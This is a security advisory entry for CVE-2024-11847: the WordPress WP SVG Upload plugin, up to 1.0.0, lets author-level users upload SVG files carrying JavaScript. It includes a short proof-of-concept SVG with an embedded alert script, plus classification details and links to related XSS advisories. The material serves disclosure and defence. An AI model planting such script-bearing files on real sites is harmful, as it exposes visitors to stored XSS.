WP SVG Upload <= 1.0.0 – Author+ Stored XSS via SVG | CVE 2024-11847 | Plugin Vulnerabilities

Description

The plugin does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.

Proof of Concept

An author can upload a SVG file containing this:

```
<?xml version="1.0" encoding="utf-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert('xss');
</script>
</svg> 
```

If a user then browses to the URL of the uploaded SVG file, the malicious JS is executed.

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Pierre Rudloff

Submitter

Pierre Rudloff

Verified

Yes

WPVDB ID

f57ecff2-0cff-40c7-b6e4-5b162b847d65

Timeline

Publicly Published

2025-03-05 (about 10 months ago)

Added

2025-03-05 (about 10 months ago)

Last Updated

2025-03-05 (about 10 months ago)

Other

Published

Title

Published

2024-01-17

Title

MapPress Maps for WordPress < 2.88.15 - Contributor+ Stored XSS

Published

2024-10-04

Title

Themify Builder < 7.6.3 - Reflected Cross-Site Scripting

Published

2023-10-09

Title

Slick Contact Forms <= 1.3.7 - Contributor+ Stored XSS

Published

2024-10-25

Title

PriPre <= 0.4.11 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

Published

2014-11-26

Title

Google Analytics by Yoast <= 5.1.2 Cross-Site Scripting (XSS)